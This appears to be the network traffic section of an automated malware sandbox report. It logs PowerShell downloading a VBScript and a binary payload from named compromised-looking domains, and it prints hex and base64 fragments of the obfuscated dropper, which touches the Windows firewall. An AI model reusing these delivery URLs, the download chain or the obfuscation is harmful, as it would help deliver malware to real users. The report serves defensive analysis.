                                                                                                        Dec 9, 2024 13:50:30.091054916 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.091439962 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.091447115 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.525305986 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.528394938 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.528476954 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.533257961 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.533257961 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.533293009 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.533305883 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.537689924 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.537744999 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.537914991 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.537970066 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.537977934 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.186455965 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.194365978 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.194401026 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.194871902 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.194876909 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.555752039 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.562944889 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.562988043 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.563379049 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.563385010 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.619435072 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.623214960 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.623258114 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.623321056 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.626220942 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.626251936 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.626265049 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.626271009 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.654043913 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.654088020 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.654380083 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.668692112 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.668720007 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.786216021 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.789305925 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.789347887 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.789719105 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.789725065 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.803754091 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.805233002 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.805268049 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.805670977 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.805676937 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.987838984 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.991872072 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.992175102 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.996864080 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.996884108 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:31.996911049 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:31.996916056 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.012897015 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.012948036 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.013003111 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.021416903 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.021444082 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.219623089 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.223109007 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.223156929 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.223217964 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.225712061 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.225732088 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.225745916 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.225752115 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.230657101 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.230710983 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.230776072 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.230906963 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.230932951 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.238866091 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.238928080 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.238991976 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.239250898 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.239250898 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.239278078 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.239290953 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.248265028 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.248295069 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.248349905 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.249213934 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.249229908 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.281543016 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.282013893 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.282030106 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.282443047 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.282448053 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.740379095 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.740473986 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.740519047 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.740693092 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.740712881 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.740726948 CET49860443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.740731955 CET4434986013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.748866081 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.748923063 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:32.748980045 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.755496025 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:32.755511045 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.390691042 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.391482115 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:33.391499043 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.392144918 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:33.392148972 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.769228935 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.771728039 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:33.771737099 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:33.773056030 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:33.773061991 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.032253981 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.032325029 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.033581018 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.033605099 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.034140110 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.034143925 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.034567118 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.034579039 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.034913063 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.034919024 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.066368103 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.066550970 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.066781044 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.067414999 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.067435026 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.067462921 CET49861443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.067468882 CET4434986113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.069907904 CET49866443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.069947004 CET4434986613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.070614100 CET49866443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.071695089 CET49866443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.071706057 CET4434986613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.203195095 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.206465960 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.206526995 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.206643105 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.206696987 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.206716061 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.206729889 CET49862443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.206734896 CET4434986213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.210124016 CET49867443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.210177898 CET4434986713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.210284948 CET49867443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.210500002 CET49867443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.210519075 CET4434986713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.466460943 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.466620922 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.466968060 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.467072010 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.467088938 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.467104912 CET49863443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.467112064 CET4434986313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.470876932 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.471311092 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.471343994 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.471714973 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.471720934 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.472357035 CET49868443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.472393990 CET4434986813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.472587109 CET49868443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.473066092 CET49868443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.473079920 CET4434986813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.477277040 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.477308035 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.477351904 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.477382898 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.477475882 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.477912903 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.477929115 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.477967978 CET49864443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.477972984 CET4434986413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.481426954 CET49869443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.481486082 CET4434986913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.481626034 CET49869443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.482007980 CET49869443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.482023001 CET4434986913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.905889988 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.908926964 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.909050941 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.909050941 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.909091949 CET49865443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.909115076 CET4434986513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.912000895 CET49870443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.912035942 CET4434987013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:34.912131071 CET49870443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.912350893 CET49870443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:34.912368059 CET4434987013.107.246.63192.168.2.8
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 9, 2024 13:48:15.201834917 CET6197153192.168.2.81.1.1.1
                                                                                                        Dec 9, 2024 13:48:15.341027975 CET53619711.1.1.1192.168.2.8
                                                                                                        Dec 9, 2024 13:48:24.427858114 CET6081753192.168.2.81.1.1.1
                                                                                                        Dec 9, 2024 13:48:24.565931082 CET53608171.1.1.1192.168.2.8
                                                                                                        Dec 9, 2024 13:48:40.576174974 CET6316353192.168.2.81.1.1.1
                                                                                                        Dec 9, 2024 13:48:40.716331959 CET53631631.1.1.1192.168.2.8
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 9, 2024 13:48:15.201834917 CET192.168.2.81.1.1.10x9993Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:24.427858114 CET192.168.2.81.1.1.10xf257Standard query (0)www.puneet.aeA (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:40.576174974 CET192.168.2.81.1.1.10x1067Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 9, 2024 13:48:15.341027975 CET1.1.1.1192.168.2.80x9993No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:15.341027975 CET1.1.1.1192.168.2.80x9993No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:18.180645943 CET1.1.1.1192.168.2.80xa077No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:18.180645943 CET1.1.1.1192.168.2.80xa077No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:24.565931082 CET1.1.1.1192.168.2.80xf257No error (0)www.puneet.aepuneet.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:24.565931082 CET1.1.1.1192.168.2.80xf257No error (0)puneet.ae209.124.66.28A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:40.716331959 CET1.1.1.1192.168.2.80x1067No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:40.716331959 CET1.1.1.1192.168.2.80x1067No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:48:51.091774940 CET1.1.1.1192.168.2.80x5852No error (0)s-0005.s-dc-msedge.net52.113.195.132A (IP address)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:49:27.395987988 CET1.1.1.1192.168.2.80x435cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 9, 2024 13:49:27.395987988 CET1.1.1.1192.168.2.80x435cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                        • www.astenterprises.com.pk
                                                                                                        • www.puneet.ae
                                                                                                        • www.fornid.com
                                                                                                        • ecs.office.com
                                                                                                        • otelrules.azureedge.net
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.849705107.161.23.1504436880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:48:16 UTC179OUTGET /it/it.vbs HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: www.astenterprises.com.pk
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-09 12:48:17 UTC392INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        content-type: text/vbscript
                                                                                                        last-modified: Mon, 09 Dec 2024 12:14:36 GMT
                                                                                                        accept-ranges: bytes
                                                                                                        content-length: 28687
                                                                                                        date: Mon, 09 Dec 2024 12:48:16 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-12-09 12:48:17 UTC976INData Raw: 0d 0a 0d 0a 27 6d 61 7a 75 72 6b 61 65 72 6e 65 20 69 6e 64 6b 72 69 6e 67 73 66 61 73 65 20 72 65 66 6c 65 78 69 76 65 73 32 34 33 21 20 74 72 69 70 74 6c 6c 65 72 73 2c 20 72 65 61 6c 69 73 61 74 69 6f 6e 73 70 72 69 73 65 6e 33 35 21 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 53 65 74 20 49 6b 6c 64 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 48 4e 65 74 43 66 67 2e 46 77 4d 67 72 22 29 0d 0a 0d 0a 53 65 74 20 72 65 73 69 64 75 61 6c 6c 75 66 74 65 6e 73 20 3d 20 49 6b 6c 64 2e 4c 6f 63 61 6c 50 6f 6c 69 63 79 2e 43 75 72 72 65 6e 74 50 72 6f 66 69 6c 65 0d 0a 0d 0a 27 47 75 72 75 65 72 6e 65 73 20 61 72 74 69 6b 75 6c 61 74 6f 72 69 73 6b 65 73 20 73 70 61 72 72 69 6e 67 70 61 72 74 6e 65 72 65 73 20 6c 79 64 73 69 64 65 3a 0d 0a 53 65 74 20 56 61 6e 64 6b
                                                                                                        Data Ascii: 'mazurkaerne indkringsfase reflexives243! triptllers, realisationsprisen35!Set Ikld = CreateObject("HNetCfg.FwMgr")Set residualluftens = Ikld.LocalPolicy.CurrentProfile'Guruernes artikulatoriskes sparringpartneres lydside:Set Vandk
                                                                                                        2024-12-09 12:48:17 UTC14994INData Raw: 30 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 56 65 72 64 65 6e 73 68 65 72 72 65 64 6d 6d 65 72 6e 65 73 20 3d 20 32 31 34 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 49 6c 62 75 64 64 65 74 20 3d 20 26 48 44 31 41 42 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 75 74 63 68 65 72 20 3d 20 36 34 30 32 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6c 6b 65 64 65 20 3d 20 26 48 46 46 46 46 33 46 30 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 68 6f 6c 61 73 20 3d 20 26 48 46 46 46 46 36 31 46 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 61 72 65 6f 6c 61 31 33 32 20 3d 20 22 54 75 72 6d 61 6c 69 6e 65 2e 20 69 6e 63 6f 6d 70 72 65 68 65 6e 73 65 3f 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 46 6f
                                                                                                        Data Ascii: 0Private Const Verdensherredmmernes = 2142Private Const Ilbuddet = &HD1ABPrivate Const Butcher = 64022Private Const Skalkede = &HFFFF3F05Private Const Pholas = &HFFFF61F8Private Const Glareola132 = "Turmaline. incomprehense?"Private Const Fo
                                                                                                        2024-12-09 12:48:17 UTC12717INData Raw: 20 2b 20 22 64 20 28 22 0d 0a 50 72 65 73 65 6e 74 69 76 65 20 3d 20 50 72 65 73 65 6e 74 69 76 65 20 2b 20 22 4d 75 6c 77 6f 72 64 69 70 6c 22 0d 0a 50 72 65 73 65 6e 74 69 76 65 20 3d 20 50 72 65 73 65 6e 74 69 76 65 20 2b 20 22 75 6d 20 27 77 6f 72 64 78 77 6f 72 64 20 22 0d 0a 27 50 61 6c 65 6f 61 6e 74 68 72 6f 70 6f 6c 6f 67 69 63 61 6c 3f 20 76 61 61 62 65 6e 66 75 6e 64 2c 20 6e 61 61 64 6c 65 72 6c 72 6c 69 6e 67 3a 20 6e 61 74 74 65 68 69 6d 6d 65 6c 65 6e 73 21 20 73 69 64 65 72 6f 6d 61 0d 0a 50 72 65 73 65 6e 74 69 76 65 20 3d 20 50 72 65 73 65 6e 74 69 76 65 20 2b 20 22 2e 20 63 72 24 54 20 47 4f 76 6c 47 69 6f 22 0d 0a 50 72 65 73 65 6e 74 69 76 65 20 3d 20 50 72 65 73 65 6e 74 69 76 65 20 2b 20 22 50 2e 62 48 79 61 53 6e 4c 77 6f 22 0d 0a
                                                                                                        Data Ascii: + "d ("Presentive = Presentive + "Mulwordipl"Presentive = Presentive + "um 'wordxword "'Paleoanthropological? vaabenfund, naadlerlrling: nattehimmelens! sideromaPresentive = Presentive + ". cr$T GOvlGio"Presentive = Presentive + "P.bHyaSnLwo"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.849707209.124.66.284434352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:48:26 UTC176OUTGET /it/Kontrastrigt.mso HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Host: www.puneet.ae
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-09 12:48:26 UTC530INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        content-type: application/octet-stream
                                                                                                        last-modified: Mon, 09 Dec 2024 03:09:30 GMT
                                                                                                        accept-ranges: bytes
                                                                                                        content-length: 439600
                                                                                                        date: Mon, 09 Dec 2024 12:48:26 GMT
                                                                                                        server: LiteSpeed
                                                                                                        strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                        x-content-type-options: nosniff
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-12-09 12:48:26 UTC16384INData Raw: 63 51 47 62 63 51 47 62 75 2b 32 52 48 41 44 72 41 6c 2b 58 36 77 4b 46 77 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 7a 53 6b 75 56 48 45 42 6d 2b 73 43 55 4a 2b 42 38 58 39 73 6a 47 4c 72 41 73 67 55 63 51 47 62 67 63 46 4f 75 6c 33 4a 63 51 47 62 36 77 4a 51 70 58 45 42 6d 33 45 42 6d 37 70 36 77 53 6d 59 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4b 4f 44 44 48 4b 36 77 49 6d 55 4f 73 43 7a 48 32 4a 46 41 76 72 41 6a 50 6c 63 51 47 62 30 65 4c 72 41 76 61 51 63 51 47 62 67 38 45 45 63 51 47 62 36 77 4c 34 48 49 48 35 30 36 42 45 41 33 7a 4b 36 77 4a 6c 52 65 73 43 49 52 6d 4c 52 43 51 45 63 51 47 62 36 77 4c 2f 45 34 6e 44 63 51 47 62 63 51 47 62 67 63 50 54 44 4d 45 42 63 51 47 62 63 51 47 62 75 72 52 72 53 45 4a 78 41 5a 74 78 41 5a 75 42 77 69 35
                                                                                                        Data Ascii: cQGbcQGbu+2RHADrAl+X6wKFwwNcJARxAZtxAZu5zSkuVHEBm+sCUJ+B8X9sjGLrAsgUcQGbgcFOul3JcQGb6wJQpXEBm3EBm7p6wSmYcQGbcQGbcQGb6wKODDHK6wImUOsCzH2JFAvrAjPlcQGb0eLrAvaQcQGbg8EEcQGb6wL4HIH506BEA3zK6wJlResCIRmLRCQEcQGb6wL/E4nDcQGbcQGbgcPTDMEBcQGbcQGburRrSEJxAZtxAZuBwi5
